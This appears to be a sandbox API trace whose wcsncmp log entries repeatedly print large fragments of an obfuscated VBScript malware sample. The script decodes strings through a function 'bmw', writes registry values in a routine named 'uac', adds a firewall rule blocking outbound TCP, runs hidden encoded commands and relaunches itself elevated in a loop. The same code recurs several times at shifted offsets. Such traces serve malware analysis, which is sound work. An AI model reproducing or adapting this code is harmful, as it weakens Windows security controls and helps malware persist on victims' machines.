bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 66 [0223.032] wcsncmp (_String1="COL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 54 [0223.032] wcsncmp (_String1="OL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 66 [0223.032] wcsncmp (_String1="L_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 63 [0223.032] wcsncmp (_String1="_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 82 [0223.032] wcsncmp (_String1="TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite 